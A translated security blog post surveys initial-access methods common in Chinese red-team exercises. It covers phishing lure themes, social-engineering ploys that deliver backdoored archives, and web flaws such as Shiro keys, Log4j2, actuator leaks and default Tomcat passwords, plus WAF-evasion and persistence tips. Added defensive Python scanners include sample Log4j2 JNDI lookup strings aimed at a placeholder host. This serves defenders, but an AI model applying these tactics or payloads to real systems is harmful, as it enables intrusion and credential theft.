Article 72: Analysis and summary of common external initial-access vulnerabilities seen in HVV and red/blue team exercises in recent years


Preface

Hello everyone, my name is ABC_123. Some time ago I spent time and energy summarizing the types of web vulnerabilities that have been common in offensive and defensive exercises over the past two or three years, together with the subject types of phishing emails. I am sharing it today, and I believe both attackers and defenders can take some inspiration from it. (Small exercises and prefecture-level exercises are not included in the statistics below for the time being, because they can be won with various routine vulnerabilities.)

The main sources of information are: 1. experience accumulated in previous offensive and defensive exercises; 2. experience identifying vulnerabilities as a referee; 3. discussions with friends and colleagues; 4. others. Next I will go through, by category, the common initial-access vulnerabilities that red team members have exploited in recent years. I hope it helps red team members organize their thinking and helps blue team members set up targeted protection.

Part1 Super 0day and supply chain 0day

For some extremely hard targets, many can only be taken by these two methods. A super 0day is a vulnerability that is fatal in one hit, has a wide impact and is not easily noticed by network security equipment, such as several buffer overflows in a certain VPN, an arbitrary account-creation vulnerability in a certain VPN, command execution in a certain chat software, virtual machine escape 0days, office software vulnerabilities, remote browser exploits and so on. We will not discuss this kind of super 0day much here; for most red team members it is out of reach. A 0day of this level is basically a nuclear weapon, and every other technique and tactic for getting an external foothold is insignificant next to it.

0day vulnerabilities in the supply chain are also very harmful and difficult to defend against. The reason is that many companies have a very large volume of business and assets, and it is hard to inventory the supply chain completely without missing a single point. The red team, on the other hand, can pick any one supply chain asset for code auditing and vulnerability mining. Generally speaking, the difficulty is considerable for both sides, so offense and defense are always relative.

Part2 Social engineering and phishing

• Email phishing

While we are at it, let me touch on email phishing, which is also one of the ways to get an external foothold. I have summarized the subject matter of phishing emails into roughly the following six categories; ABC_123 may break them down further in the future when I have the energy.


Work-themed: resumes, self-recommendation letters, employee regularization applications, cooperation details attached, business license applications for filing.

Complaint-themed: complaints about illegal charging of various fees, complaints and suggestions about a certain matter, notification of non-compliance responsibilities, complaints that publicity did not meet expectations, announcements about serious dereliction of duty, complaints about excessive collection of user information.

Welfare-themed: salary adjustment notices, fake welfare benefits, Mid-Autumn Festival mooncake collection notices, holiday award collection notices, holiday benefit notices, summer high-temperature allowances, summer work uniform collection, salary structure adjustments.

Security-themed: phishing-email protection notifications, security vulnerability patch upgrades, internal data sharing from attack and defense drills, defender contact information notifications, major vulnerability inspection notifications.

Notice-themed: mailbox quota upgrades, pending express deliveries, the sixteen work guidelines, capacity improvement special training notices, epidemic prevention and control work arrangements, annual individual income tax reconciliation, "learning to strengthen education", canteen menu survey notices.

Popular topics: the World Cup, the epidemic and the like, which everyone can probably think of.

• Adding friends on WeChat

Red team members usually maintain several accounts, many of them with attractive women's avatars, and their WeChat Moments regularly post life updates. They first obtain the mobile phone numbers of employees of the target unit through various kinds of information collection on the Internet, then add them as friends on WeChat, claim to be the HR of a large company, and send a compressed package themed as internal recruitment for a position with an annual salary of one million, which is actually a backdoor program. There are many successful cases of this method, so everyone should be on guard.

• Joining QQ groups

Red team members use various searches to find QQ groups that employees of the target company set up themselves by team or department. They claim to be new employees, or to have been told by a certain leader to join, or to need to install a security check tool, and so on. Once in the group, they post a compressed package with a backdoor, which usually yields sizeable results. They also search the group's shared files for sensitive documents, address book lists and the like; many times, account passwords for internal systems have been found in the QQ group. Everyone should be on guard.

• Maimai job search combined with WeChat chat

Red team members go to job platforms such as Maimai to locate operations and maintenance staff and other personnel of the target unit, claim to be senior executives at Alibaba, Tencent or Huawei doing targeted recruitment with an annual salary of one million, then lure them into a WeChat chat and send a phishing email or a trojanized compressed package. I was surprised to find how many successful cases like this there are, and everyone should be on guard.

Part3 Web vulnerabilities

• Sensitive information leakage

I put this first because I hope it draws everyone's attention. Some units have been attacked several times, and I did not expect these information leakage problems to still exist. Here are some cases for reference.

Case 1: a JSON document served directly from the official website contained the clear-text account and password of an MSSQL instance, and its IP address was on the external network.

Case 2: capturing packets with Burp Suite, the AK/SK of a certain cloud was found in the JS source code.

Case 3: unpacking the APK and decompiling the Java code revealed the AK/SK of a certain cloud.

Case 4: extracting information from APKs in batches turned up a lot of inconspicuous IP+port assets.

Case 5: a website's documentation can reveal unexpected assets, which can then be penetrated with routine vulnerabilities such as Shiro deserialization and Log4j2.

Case 6: in a software package linked from the official website, the configuration file contained a SOCKS5 proxy that connected straight into the intranet.

Case 7: SVN and other source code leak vulnerabilities, followed by a PHP code audit to find an upload vulnerability.
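Cases 2 through 4 come down to credential strings sitting in shipped client code. As an added example (not from the original post), here is a defender-side scanner over constructed JS and JSON samples that reports credential-like assignments, masks the values and scores their entropy; the sample text, the key-name list and the entropy threshold are assumptions.

```python
import math
import re
from collections import Counter

# Constructed samples standing in for a JS bundle and a JSON document of the kind the cases
# above describe. Every value here is made up; none is a real credential or host.
SAMPLE_JS = """
var cfg = { region: "cn-hangzhou",
  accessKeyId: "LTAI4GExampleExampleKey1",
  accessKeySecret: "x9QvT2pR7mK3nW8sZ1bC5dF6gH0jL4eN2uY7a" };
var debug = false;
"""
SAMPLE_JSON = '{"db": {"host": "203.0.113.10", "user": "sa", "password": "P@ssw0rd!2019"}}'

# Credential-carrying key names followed by  : "value"  or  = "value" (quoted JSON keys allowed).
CRED_KEY = re.compile(
    r'(?i)\b(access[_-]?key[_-]?(?:id|secret)|secret[_-]?key|password|passwd|pwd|token)\b'
    r'["\']?\s*[:=]\s*["\']([^"\']{6,})["\']')


def shannon_entropy(s):
    """Bits per character; random-looking keys score high, words and dates score low."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def mask(value):
    """Keep only a short prefix so a report can be shared without re-leaking the secret."""
    return value[:4] + "*" * (len(value) - 4)


def find_secrets(text, min_entropy=3.0):
    """Return one finding per credential-like assignment found in text."""
    findings = []
    for m in CRED_KEY.finditer(text):
        key, value = m.group(1), m.group(2)
        entropy = shannon_entropy(value)
        findings.append({
            "key": key,
            "value": mask(value),
            "entropy": round(entropy, 2),
            # Low-entropy values are still reported: the key name alone warrants a look.
            "high_entropy": entropy >= min_entropy,
        })
    return findings


def scan_sources(sources):
    """sources: {name: text}. Returns {name: findings} for sources with at least one hit."""
    report = {}
    for name, text in sources.items():
        hits = find_secrets(text)
        if hits:
            report[name] = hits
    return report


if __name__ == "__main__":
    for name, hits in scan_sources({"app.js": SAMPLE_JS, "config.json": SAMPLE_JSON}).items():
        for h in hits:
            print(f"{name}: {h['key']} = {h['value']} (entropy {h['entropy']})")
```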

• Shiro deserialization vulnerability

I am still surprised that this vulnerability has existed for so many years, and there have been many success stories in recent years. However, Shiro deserialization is rarely seen in level-1 units or on second-level domain assets; it is mainly concentrated in the edge assets of level-2 units, the assets of level-3 and level-4 units, and assets such as official accounts and mini programs. In all these cases the Shiro keys were common keys; personally I feel a list of just over 100 common keys is enough.

In addition, several reports on exploiting this vulnerability posted uncommon Shiro keys that are rarely seen; I speculate that those keys were extracted from a Spring Boot heapdump and then used. When exploiting this vulnerability, remember to change the Shiro key so that the access can be kept longer.
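The defender-side counterpart of the two paragraphs above is to make sure no deployment still runs on a common key. As an added example (not from the original post), this audit pulls 128-bit Base64 keys out of a constructed Shiro config fragment, flags the one hardcoded default that Shiro 1.2.4 shipped (the only key listed here; the page's "list of 100+ common keys" is not reproduced), and generates a replacement.

```python
import base64
import re
import secrets

# The AES key Shiro 1.2.4 shipped as its hardcoded rememberMe default. A deployment still
# using it, or any other widely circulated key, is what the text calls a "common key".
KNOWN_DEFAULT_KEYS = {"kPH+bIxk5D2deZiIxcaaaA=="}

# Constructed sample: a Java config fragment of the kind found in a Shiro-based app
# (the key value is the real public default; everything else is made up).
SAMPLE_CONFIG = '''
CookieRememberMeManager rememberMeManager = new CookieRememberMeManager();
rememberMeManager.setCipherKey(Base64.decode("kPH+bIxk5D2deZiIxcaaaA=="));
'''

# A 16-byte key Base64-encodes to 22 characters plus "==" padding.
B64_KEY_16 = re.compile(r"(?<![A-Za-z0-9+/])([A-Za-z0-9+/]{22}==)")


def extract_keys(config_text):
    """Pull every Base64 string shaped like a 128-bit key out of a config/source fragment."""
    return B64_KEY_16.findall(config_text)


def audit_key(b64key):
    """Return a list of problems with a rememberMe cipherKey; an empty list means no finding."""
    issues = []
    if b64key in KNOWN_DEFAULT_KEYS:
        issues.append("known default key")
    try:
        raw = base64.b64decode(b64key, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return issues + ["not valid Base64"]
    if len(raw) not in (16, 24, 32):
        issues.append(f"{len(raw) * 8}-bit key is not a valid AES key size")
    return issues


def audit_config(config_text):
    """Map each key found in the fragment to its issues."""
    return {k: audit_key(k) for k in extract_keys(config_text)}


def generate_key():
    """A fresh random 128-bit key in the Base64 form Shiro config expects."""
    return base64.b64encode(secrets.token_bytes(16)).decode()


if __name__ == "__main__":
    for key, issues in audit_config(SAMPLE_CONFIG).items():
        print(key, "->", issues or "ok")
    print("replacement:", generate_key())
```

Rotating the key also invalidates every outstanding rememberMe cookie, so plan the change for a maintenance window.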

• OA system vulnerabilities

I later summarized that these OA systems mainly include a certain "Far" OA, a certain "Micro" OA, a certain "Household" OA, Fanruan, a certain comprehensive security system, a certain "Micro" mobile platform, a certain e-mobile, a certain "Ling" OA, a certain "Friend" cloud, a certain "Friend" NC, a certain OA system, a certain "Channel" and so on (vendor names anonymized as in the original). Their nday vulnerabilities can also be encountered in the edge assets of level-2 units and in level-3 and level-4 units. Unless you have a 0day, the main assets of level-1 and level-2 units are hard to exploit successfully.

• Fastjson vulnerability

There are still many of these nday old holes, especially in the WeChat official account and mini program assets of the target. You can try them on JSON data packets. For versions before 1.2.47, exploitation is very simple and echo can be implemented as well; for versions before 1.2.68, exploitation mostly focuses on the fake-MySQL-server idea, and there are a few successful cases of writing shells; fastjson 1.2.68 through 1.2.80 has vulnerabilities too, but I have not seen anyone exploit them successfully in real engagements. I do not rule out that some experts have internal tricks, so it is still necessary to upgrade to the latest version.

For Jackson deserialization, the exploitation conditions are too harsh and successful cases are very few, so when I see Jackson I usually give up.

• Log4j2 vulnerability

Like the fastjson vulnerability, most instances of this nday are discovered with Burp Suite's passive scanning plug-in and pop up unexpectedly. When scanning for this vulnerability, remember not to use the common dnslog services, because their characteristics are too obvious: mainstream WAFs and traffic monitoring devices have blacklisted the commonly used dnslog domains. It is best to build one anonymously yourself. This is also why others can discover a given Log4j2 vulnerability while you cannot.
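The paragraph above shows why blacklisting callback domains is a weak detection: the attacker simply changes the domain. As an added example (not from the original post), this detector keys on the lookup syntax itself, collapsing the nested `${lower:...}` / `${::-...}` obfuscations that Log4j2 resolves before checking for a JNDI lookup; the log lines are constructed and the hosts are reserved example names.

```python
import re

# Constructed web-server access log lines for testing; addresses and hosts are reserved
# documentation values. Entries 1-3 carry lookup strings of the kind detection rules look for.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [10/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://probe.example.invalid/a}"',
    '198.51.100.9 - - [10/Dec/2021:10:01:09 +0000] "GET /?q=${${lower:j}${upper:n}di:dns://probe.example.invalid} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '198.51.100.10 - - [10/Dec/2021:10:01:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}ndi:rmi://probe.example.invalid/x}"',
    '198.51.100.11 - - [10/Dec/2021:10:01:20 +0000] "GET /price?amount=${total} HTTP/1.1" 200 33 "-" "Mozilla/5.0"',
]

# Innermost ${...} with no nested braces inside.
INNERMOST = re.compile(r"\$\{([^{}]*)\}")
# Once normalized, the lookup prefix is plain; match regardless of case or stray spaces.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(m):
    inner = m.group(1)
    if inner.lower().startswith(("lower:", "upper:")):  # ${lower:j} -> j
        return inner[6:]
    if ":-" in inner:                                     # ${::-j} or ${env:NOPE:-j} -> j
        return inner.rpartition(":-")[2]
    return m.group(0)  # leave real lookups (and harmless templates like ${total}) alone


def normalize(text, max_rounds=10):
    """Collapse nested text-transforming lookups, innermost first, until nothing changes."""
    for _ in range(max_rounds):
        new = INNERMOST.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def is_jndi_lookup(line):
    return JNDI.search(normalize(line)) is not None


def scan(lines):
    """Indices of lines carrying a JNDI lookup, obfuscated or not."""
    return [i for i, line in enumerate(lines) if is_jndi_lookup(line)]


if __name__ == "__main__":
    for i in scan(SAMPLE_LOG):
        print(i, normalize(SAMPLE_LOG[i]))
```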

• Spring Boot framework vulnerabilities

Regarding exploitation of Spring Boot vulnerabilities, there are many successful cases using /actuator/env and heapdump. Check not only the root directory but also the subdirectories, and whether there are relevant URL routes under the /api/ directory; on some sites each subdirectory is actually mapped to a different backend application. All sorts of account passwords can be extracted from a heapdump, and there are many cases where a certain cloud's AK/SK was found. I have also seen the Spring Cloud Gateway vulnerability used. At first I thought the chance of meeting it in a real engagement was too small, but it does exist, and I have seen several successful cases.
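Whether /actuator/env and heapdump are reachable is decided by a handful of Spring Boot properties. As an added example (not from the original post), this audit parses two constructed `application.properties` fragments, one exposing everything and one hardened, and works out which sensitive endpoints the include/exclude/enabled settings leave exposed; the property names are real Spring Boot 2.x keys, the sensitive-endpoint list and the 2.5+ default of `health` are assumptions.

```python
# Constructed application.properties fragments: the first exposes every actuator endpoint over
# HTTP, the second is the hardened form. Property names are real Spring Boot 2.x keys.
WEAK = """
server.port=8080
management.endpoints.web.exposure.include=*
"""
HARDENED = """
server.port=8080
management.endpoints.web.exposure.include=health,info
management.endpoint.env.enabled=false
management.endpoint.heapdump.enabled=false
management.server.port=9090
"""

# Endpoints whose exposure most often leads to credential or key leakage (assumed list).
SENSITIVE = {"env", "heapdump", "configprops", "beans", "mappings", "threaddump", "loggers"}


def parse_properties(text):
    """Minimal key=value parser; comments (# or !) and blank lines are skipped."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "!")):
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props


def _csv(value):
    return {v.strip() for v in value.split(",") if v.strip()}


def exposed_sensitive(props):
    """Sensitive endpoints reachable over the web given include/exclude/enabled settings.
    Assumes the Spring Boot 2.5+ default of exposing only 'health' when include is unset."""
    include = props.get("management.endpoints.web.exposure.include", "health").strip()
    exclude = _csv(props.get("management.endpoints.web.exposure.exclude", ""))
    if "*" in exclude:
        return []
    exposed = set(SENSITIVE) if include == "*" else _csv(include) & SENSITIVE
    exposed -= exclude
    # management.endpoint.<id>.enabled=false switches an endpoint off regardless of exposure.
    exposed = {e for e in exposed
               if props.get(f"management.endpoint.{e}.enabled", "true").lower() != "false"}
    return sorted(exposed)


def on_separate_port(props):
    """True when actuator is bound to its own management port, off the application's path."""
    mgmt = props.get("management.server.port")
    return mgmt is not None and mgmt != props.get("server.port")


if __name__ == "__main__":
    for name, text in (("weak", WEAK), ("hardened", HARDENED)):
        p = parse_properties(text)
        print(name, "exposed:", exposed_sensitive(p), "separate port:", on_separate_port(p))
```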

• Nacos series of vulnerabilities

This kind of vulnerability is like the Spring Boot interface vulnerability: there are surprisingly many successful exploitation cases, and you also have to look at both the root directory and the secondary directories. The red team's main methods are Nacos weak passwords, the Nacos add-account vulnerability and so on, to get into the Nacos backend. There you find database account passwords; with MSSQL or Oracle you can basically obtain server permissions, and sometimes you find a certain cloud platform's AK/SK and get a large number of servers.

• Weblogic vulnerabilities

The use of Weblogic vulnerabilities has dropped a lot compared with previous years, which also surprised me. I have spent much effort studying the echo (response output) of these vulnerabilities, writing in-memory webshells and so on, and I used to run into Weblogic deserialization all the time. I think the reasons for the reduced frequency may be the following:

1. When the target has no outbound network access, it is difficult to obtain permissions with the newer Weblogic vulnerabilities;

2. Exploiting the later Weblogic vulnerabilities (such as the series of coherence library vulnerabilities that started with CVE-2020-2555) is very troublesome; solving coherence library compatibility is a pain, and it is hard to cover everything at the tool level;

3. Some Weblogic exploits differ between jdk1.5, jdk1.6, jdk1.7, jdk1.8 and other environments, but the final exploitation tool can only be compiled under one JDK version, so it is difficult to cover both at once; the requirements contradict each other and exploitation fails.

4. The firewall or WAF directly blocks the T3 and IIOP protocols. Sometimes only T3 is blocked while IIOP is still allowed, so it is worth trying; of course the blue team should remember to guard against this too.

5. A filter has been added to the T3 protocol that restricts access to a whitelist, so it cannot be used.

• Ueditor upload vulnerability

There are many of these. Most exploits focus on the getshell caused by SSRF. Again, look at both the root directory and the secondary directories; some JS source code contains records of a ueditor directory, and you can try this vulnerability there.

• SQL injection vulnerability

This vulnerability appears in external network assets more often than I thought. Nowadays many people are unwilling to look for SQL injection, but from exchanging experiences I found there are still a large number in the edge assets of level-2 units and in level-3 and level-4 units. If you find a SQL injection vulnerability and are lucky enough to hit a large target, the harm can be very serious; with MSSQL or Oracle you can escalate privileges to server permissions. Of course, if you hit a cloud-hosted system, use other methods first and SQL injection only as a last resort: the cost of bypassing a cloud WAF with SQL injection is too high, and if you have the energy it is better to find another entrance. So everyone should still pay attention to preventing SQL injection vulnerabilities.

• Tomcat vulnerabilities

Among the side assets of the subsidiaries of several units there were actually weak Tomcat passwords, tomcat:tomcat. I did not expect this, and I have seen several successful cases. On closer inspection, the common feature of these cases is that the port was not the usual 8080; presumably the red team ran full port scans and service identification on every IP. There are also successful cases of obtaining a webshell through the Tomcat AJP protocol.

• Struts2 series vulnerabilities

Fewer and fewer web applications use the Struts2 framework now, but it can still be seen, and there are several successful cases on the Internet. It has become more valuable than before during lateral movement in the intranet, and seems to have turned into a vulnerability for intranet lateral exploitation.

• Various upload vulnerabilities

There are still many very typical successful cases of administrator account password plus background upload of a shell. I will not go into detail here; I believe everyone is familiar with it.

• Various weak password vulnerabilities

Sentinel weak passwords; MySQL 3306 weak passwords (but I have never seen a SQL Server weak password on the external network, presumably because any that existed were long ago taken over by the botnet-herding crews out there); phpMyAdmin weak passwords; administrator weak passwords (if you can see the address book in the backend, that is valuable too); unauthenticated Druid exposing sessions, which are used to log in to the backend and obtain data.

• Logic vulnerabilities / authorization bypass vulnerabilities

Official accounts and mini programs also have business logic vulnerabilities, such as the common order traversal and user identity traversal, which are also very serious. Some security vendors may not have their own red team members but still take part in offensive and defensive exercises; their main focus is discovering business logic vulnerabilities, and sometimes they get remarkable results, such as user information traversal vulnerabilities that yield many rows of data and do great harm. Decrypting the JS encryption algorithm of mini programs or other encrypted pages will uncover high-value business logic vulnerabilities.

• Other vulnerabilities

There are successful cases for the following vulnerabilities, but they are very rare: Sunflower (Sunlogin) remote-control RCE (very often on a high port), JBoss deserialization, the eWebEditor upload vulnerability, Dubbo high-port deserialization, RMI port deserialization, the Nexus CVE-2019-7238 vulnerability, and xxl-job, where a password found on the intranet is reused from the external network to gain access. There are also some vulnerabilities in network equipment, which I will not list one by one.

Part4 Intranet

I will write a dedicated article on this part later when I have time; for now, a brief introduction:

1. The number of exploits targeting VMware vCenter and similar vulnerabilities has increased significantly. Many red team members like to use this vulnerability against machines on the intranet, that is, to take over the cloud platform.

2. When looking at domain controller takeovers, you can see that many were taken with the Zerologon vulnerability. Of course it cannot be ruled out that the domain controller was taken by other means and Zerologon was mistakenly written into the report.

3. After getting a webshell or a database, also rummage for a certain cloud's AK/SK and the like; you will have unexpected gains.

4. Regarding industrial control systems, I have to admit that some red team members have very strong intranet lateral movement capabilities. Judging from the text descriptions, they go straight for the industrial control target, jumping from one network segment to another. With each lateral step they know exactly where they are on the intranet, and a clear intranet topology gradually forms in their minds.

Some red team members also took down industrial control systems by scanning for weak passwords across the intranet services, taking several servers with MS17-010, extracting common passwords or hashes, and then snowballing with batch scans. Large-scale intranet scans discovered industrial control web management interfaces and the like, and they stumbled into the industrial control segment. This is actually also a method.

5. After getting a database or a domain controller on the intranet, do not forget to try the same accounts and passwords against the unified authentication system on the external network. You will often have unexpected gains, and sometimes you get straight into the VPN and other systems. Therefore the unified authentication system on the external network needs stronger protection.


This public account focuses on sharing network security technology, including APT event analysis, red team attack and defense, blue team analysis, penetration testing, code audit and more. One article per week, 99% original; stay tuned.

Contact me: 0day123abc#gmail.com(replace # with @)


Source: blog.csdn.net/m0_71692682/article/details/132002386